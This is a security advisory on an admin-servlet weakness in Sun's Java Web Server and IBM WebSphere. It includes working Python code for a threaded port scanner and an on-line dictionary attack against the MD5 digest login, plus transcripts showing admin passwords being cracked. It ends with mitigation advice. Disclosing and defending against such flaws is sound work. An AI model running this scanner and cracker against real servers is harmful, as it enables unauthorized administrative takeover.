An interesting security weakness is present in Sun's Java Web Server 1.1.3. The weakness also appears in IBM's WebSphere 2.0.2, and is, in fact, inherited from Sun's server toolkit. In what follows we will describe a problem common to both web servers. However, we will generally refer only to Sun's Java Web Server when we mention specific details, and often we will not mention a web server by name at all. Thus we will use an expression such as "the admin servlet" instead of the much more cumbersome "the admin servlet in IBM's WebSphere and the Java Web Server." It should be understood that what we write applies equally to both products.
The Java Web Server comes equipped with a handy web interface for server administration. To reach it an administrator points a web browser at a standard URL and downloads a Java applet, com.sun.server.admin.toolkit.AdminApplet. The applet requires a user name and password before it grants administrative access to the web server. When one types them in and presses the "Log in" button, the applet submits them to a listening admin servlet, com.sun.server.http.AdminServlet. Since the applet uses MD5 to hash the user name, password, and some other items, among them a nonce handed out by the servlet, the credentials are not submitted as plain text. This is a form of digest authentication. It is worth being clear about what that does and does not buy: the hash keeps the password from a passive eavesdropper, but anyone who can talk to the servlet receives the same nonce and can compute the same digest for any candidate password, so the scheme does nothing to slow down guessing.
One might be tempted to think that by restricting access to the admin applet, or by removing it altogether, one is thereby preventing unauthorized access to the web server. Unfortunately, this is not the case, for it is an easy matter to bypass the admin applet completely and interact directly with the admin servlet. To make matters worse, though the admin servlet's port can be changed, the servlet cannot be disabled, since the Java Web Server uses it internally at startup and shutdown. To make matters worse still, the name of the web server's administrative user, "admin," appears to be hard coded into the web server, and there is no way to change it, either by using the handy web interface or by setting a web server property. These last three facts make it a simple matter to write a port scanner to detect the presence of an admin servlet and to launch a multi-threaded, on-line attack on the admin password.
2. Finding the Admin Servlet
As proof of concept, we have written a simple, multi-threaded port scanner,
AdminScanner.java,
which accepts a host name, low port, and high port, and then launches
PortScanner Threads
to examine the specified host for the presence of an admin servlet listening on
a port in the specified range. Since AdminScanner looks for responses
that characterize the admin servlet, it can distinguish between the
Java Web Server and IBM's WebSphere, and it reports other
potentially interesting responses, as the edited AdminScanner transcript
reproduced at the end of this page shows.
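The procedure just described, as an added example that is not the original AdminScanner.java: a threaded prober in Python that sends GET /servlet/admin to every port in a range and classifies whatever answers. The page does not give the signatures AdminScanner uses to tell the two admin servlets apart, so the fingerprint substrings below are placeholders (assumptions), and the Server header in the demo is invented; the services it scans are constructed stand-ins on 127.0.0.1 so the block runs offline.

```python
"""Threaded probe for an HTTP admin servlet, with response classification.

Added example; this is not the AdminScanner.java of the original write-up.
The strings used below to recognise the two admin servlets are placeholders
(assumptions), because the page does not give the real tool's signatures.
"""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

PROBE_PATH = "/servlet/admin"

# Assumed fingerprints: substrings looked for in the HTTP response headers.
ADMIN_FINGERPRINTS = {
    "Java Web Server Admin Servlet": b"JavaWebServer",
    "IBM WebSphere Application Server Admin Servlet": b"WebSphere",
}


def classify_response(data: bytes) -> str:
    """Describe what a port sent back to our GET /servlet/admin request."""
    if not data:
        return "no response"
    if data.startswith(b"HTTP/"):
        headers = data.split(b"\r\n\r\n", 1)[0]
        for label, needle in ADMIN_FINGERPRINTS.items():
            if needle in headers:
                return label
        status_line = headers.split(b"\r\n", 1)[0].decode("latin-1", "replace")
        return "other HTTP service: " + status_line
    # Non-HTTP bytes: an SMTP/FTP/finger style banner answered our HTTP request.
    # Worth reporting, like the original scanner's "interesting response".
    banner = data.split(b"\n", 1)[0].strip().decode("latin-1", "replace")
    return "interesting non-HTTP response: " + banner


def probe_port(host: str, port: int, timeout: float = 2.0):
    """Connect, send an HTTP GET for the admin servlet path, classify the reply.
    Returns None when nothing is listening (refused, filtered or unreachable)."""
    request = f"GET {PROBE_PATH} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            received = b""
            try:
                while len(received) < 4096:
                    chunk = sock.recv(4096)
                    if not chunk:
                        break
                    received += chunk
            except socket.timeout:
                pass  # a service that never closes; classify what we have
            return classify_response(received)
    except OSError:
        return None


def scan(host: str, ports, max_threads: int = 100) -> dict:
    """Probe `ports` concurrently; map each answering port to its classification."""
    with ThreadPoolExecutor(max_workers=max_threads) as pool:
        verdicts = pool.map(lambda p: probe_port(host, p), ports)
        return {p: v for p, v in zip(ports, verdicts) if v is not None}


def start_fake_service(banner: bytes) -> int:
    """Constructed stand-in for a network service on 127.0.0.1: accepts one
    connection, reads the probe, answers with `banner`, closes. Returns the port."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]

    def serve():
        with listener:
            conn, _ = listener.accept()
            with conn:
                conn.recv(1024)
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    # Constructed banners; the Server header value is invented for the demo.
    targets = [
        start_fake_service(b"220 bozo ESMTP ready\r\n"),
        start_fake_service(b"HTTP/1.0 401 Unauthorized\r\n"
                           b"Server: JavaWebServer/1.1.3\r\n\r\n"),
    ]
    for port, verdict in sorted(scan("127.0.0.1", targets).items()):
        print(f"{port}: {verdict}")
```

The non-HTTP branch is why a scan like this turns up SMTP, FTP and finger banners: those services announce themselves as soon as a client connects, whatever the client sends, which is exactly what the port 21, 25 and 79 entries in the transcript are.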
3. Cracking the Admin Password
Once an admin servlet has been found, one can readily mount a multi-threaded,
on-line attack against the web server's "admin" password. As proof of
concept we have written a simple cracking utility,
CrackAdmin.java.
One need only supply the host name and port number of an admin servlet,
together with the full path of a
gzipped dictionary file,
the maximum number of active Threads desired, and the number of passwords
to check per Thread. CrackAdmin then reads the complete dictionary,
calculates the proper number of
cracking Threads to launch,
and proceeds to mount a dictionary attack. In doing so it makes use of
MD5 to handle the digest
authentication. Continuing with our previous example is very instructive;
the edited CrackAdmin transcript is reproduced at the end of this page. Note
that in the second run the cracker re-reads the nonce partway through and
carries on.
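The attack just described, as an added example that is not the original CrackAdmin.java: a threaded, on-line dictionary attack on a nonce-based MD5 digest login, run against an in-process stand-in for the admin servlet so it works offline. The digest formula used is the RFC 2617 (HTTP Digest) one; that is an assumption, since the page says only that MD5 is applied to the user name, password "and some other items". The stand-in servlet rotates its nonce partway through, as the transcript shows happening, and the cracker re-reads it when told a guess was built on a stale one. The gzipped word list is constructed for the demo.

```python
"""Dictionary attack on a nonce-based MD5 digest login, run against an
in-process stand-in for the admin servlet.

Added example, not the CrackAdmin.java of the original write-up. The digest
formula is the RFC 2617 (HTTP Digest) one, an assumption: the page says only
that MD5 covers the user name, password "and some other items". The stand-in
servlet and the gzipped word list are constructed for the demo.
"""
import gzip
import hashlib
import hmac
import io
import os
import threading
from concurrent.futures import ThreadPoolExecutor

USER = "admin"  # the administrative user name is fixed; only the password is unknown

def md5hex(text: str) -> str:
    return hashlib.md5(text.encode("latin-1")).hexdigest()

def digest_response(user, realm, password, nonce, method="POST", uri="/servlet/admin"):
    """RFC 2617 style digest (assumed scheme). Everything but the password is
    known to the attacker, so the digest is recomputed for every guess: the
    hash keeps the password off the wire but does not slow down guessing."""
    ha1 = md5hex(f"{user}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")

class FakeAdminServlet:
    """Constructed stand-in: hands out a nonce, checks digests, and rotates the
    nonce every `rotate_every` attempts (the transcript shows the nonce changing
    partway through a run), answering 'stale' to a guess built on an old one."""
    REALM = "admin"

    def __init__(self, password, rotate_every=500):
        self._password = password
        self._rotate_every = rotate_every
        self._attempts = 0
        self._lock = threading.Lock()
        self._nonce = os.urandom(16).hex()

    def challenge(self) -> str:
        with self._lock:
            return self._nonce

    def login(self, user, nonce, response) -> str:
        with self._lock:
            current = self._nonce
            self._attempts += 1
            if self._attempts % self._rotate_every == 0:
                self._nonce = os.urandom(16).hex()
            if nonce != current:
                return "stale"
            expected = digest_response(user, self.REALM, self._password, current)
            good = user == USER and hmac.compare_digest(expected, response)
            return "ok" if good else "bad"

def read_dictionary(gz_bytes: bytes) -> list:
    """Word list from gzipped bytes; the user name itself is tried first."""
    with gzip.open(io.BytesIO(gz_bytes), "rt", encoding="latin-1") as f:
        return [USER] + [line.strip() for line in f if line.strip()]

def crack_admin(servlet, words, max_threads=4, per_thread=100):
    """Split the word list into per-thread chunks and guess on-line, re-reading
    the nonce whenever the servlet reports it stale. Returns the password or None."""
    stop, found, lock = threading.Event(), [], threading.Lock()
    nonce_box = {"nonce": servlet.challenge()}

    def attempt(password) -> bool:
        while not stop.is_set():
            nonce = nonce_box["nonce"]
            digest = digest_response(USER, servlet.REALM, password, nonce)
            verdict = servlet.login(USER, nonce, digest)
            if verdict != "stale":
                return verdict == "ok"
            with lock:  # refresh once even if several threads saw the stale reply
                if nonce_box["nonce"] == nonce:
                    nonce_box["nonce"] = servlet.challenge()
        return False

    def worker(chunk):
        for password in chunk:
            if stop.is_set():
                return
            if attempt(password):
                found.append(password)
                stop.set()

    chunks = [words[i:i + per_thread] for i in range(0, len(words), per_thread)]
    with ThreadPoolExecutor(max_workers=max_threads) as pool:
        list(pool.map(worker, chunks))
    return found[0] if found else None

# Constructed word list standing in for ../Dicts/big.dict.gz.
SAMPLE_DICT_GZ = gzip.compress(b"aardvark\nabacus\nletmein\nmagic\npassword\nsunshine\n")

if __name__ == "__main__":
    target = FakeAdminServlet("magic", rotate_every=5)
    print(crack_admin(target, read_dictionary(SAMPLE_DICT_GZ), max_threads=3, per_thread=2))
```

The point to take from `digest_response` is that the nonce is the only thing the server contributes, and the server hands it to whoever asks; a rotating nonce therefore costs the attacker one extra round trip per rotation and nothing more. Only a password that is not in any word list, or a limit on failed attempts, changes the outcome.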
4. Conclusions
Obviously, knowing the admin password allows one complete access
to the web server's administrative interface via the admin applet.
Even if the admin applet is disabled, one can still manipulate the
admin servlet and perform all of the same administrative
activities. Thus it is really the admin servlet that is the source
of all of the trouble. The admin applet simply makes the hacker's
job a little easier.
Unfortunately for web server administrators, the admin servlet runs
outside of the control of the Java Web Server as, essentially,
a mini-web server within a web server. Consequently, it cannot be
configured like other servlets in the Java Web Server. As we
previously mentioned, it is not possible to disable the admin
servlet without breaking the web server at the same time.
So what should be done about the problematic admin servlet?
The most prudent action, of course, would be to use neither the
Java Web Server nor IBM's WebSphere until the problem is corrected.
We believe that the proper solution to the problem is to not have such
servlets lurking within web servers as back doors awaiting hackers to enter.
If Sun and IBM insist upon providing them, then admin servlets ought to be
run through their HTTPS web servers, and certificate authentication
should be required for administrative access to them. Until the admin
servlet problem is properly solved, web server administrators of the
affected web servers should change all web server passwords to long
character strings unrelated to dictionary entries in any language.
Hashing a passphrase to produce such a string does not help: the result is
exactly as guessable as the passphrase, because the attacker can apply the
same hash function. Generate the string from a cryptographically strong
random source instead. Additionally, access to the port on which the admin
servlet is listening should be blocked for every address except those from
which the server is actually administered.
Edited AdminScanner transcript (Section 2, Finding the Admin Servlet):
% java AdminScanner bozo.victims.com 1 10000
Scanning bozo.victims.com from port 1 to port 10000:
.
.
.
PortScanner-25: Got the following interesting response from
http://bozo.victims.com:25/servlet/admin
bozo.victims.com Sendmail SMI-8.6/SMI-SVR4 ready at Wed, 31 Mar 1999
14:51:46 -0500
PortScanner-21: Got the following interesting response from
http://bozo.victims.com:21/servlet/admin
220 bozo FTP server (UNIX(r) System V Release 4.0) ready.
PortScanner-79: Got the following interesting response from
http://bozo.victims.com:79/servlet/admin
Name TTY Idle When Where
.......................................................................
.......................................................................
.......................................................................
.
.
.
(9000) Running Finalization and Garbage Collection
.......................................................................
.......................................................................
.......................................................................
.
.
.
PortScanner-9091: Java Web Server Admin Servlet found at
http://bozo.victims.com:9091/servlet/admin
PortScanner-9099: Java Web Server Admin Servlet found at
http://bozo.victims.com:9099/servlet/admin
PortScanner-9527: IBM WebSphere Application Server Admin Servlet found
at http://bozo.victims.com:9527/servlet/admin
.......................................................................
.................^C
Edited CrackAdmin transcript (Section 3, Cracking the Admin Password):
% java -ms96m -mx128m CrackAdmin bozo.victims.com 9527 ../Dicts/big.dict.gz 100 100
Reading dictionary entries from ../Dicts/big.dict.gz...
Read 338961 entries from ../Dicts/big.dict.gz
Target URL set to http://bozo.victims.com:9527/servlet/admin
Nonce set to 1b85777f97b65a3fe25eae94a4f1c516
Deploying 3390 Threads to test 338962 passwords
Allowing at most 100 active Threads at any time
Each Thread will test 100 passwords
AdminCracker-0: The admin password for
http://bozo.victims.com:9527/servlet/admin is "admin"
% java -ms96m -mx128m CrackAdmin bozo.victims.com 9099 ../Dicts/big.dict.gz 100 100
Reading dictionary entries from ../Dicts/big.dict.gz...
Read 338961 entries from ../Dicts/big.dict.gz
Target URL set to http://bozo.victims.com:9099/servlet/admin
Nonce set to 55e5ea352175da356bea57b4aeb14aac
Deploying 3390 Threads to test 338962 passwords
Allowing at most 100 active Threads at any time
Each Thread will test 100 passwords
.......................................................................
.......................................................................
.......................................................................
.
.
.
(1800) Running Finalization and Garbage Collection...
.......................................................................
.......................................................................
.......................................................................
.
.
.
.......................................................................
.......................................................................
.........................?.............................................
.......................................................................
Nonce set to e659376b45a5e317aa9983a0d6849f20
........
AdminCracker-1722: The admin password for
http://bozo.victims.com:9099/servlet/admin is "magic"
.^C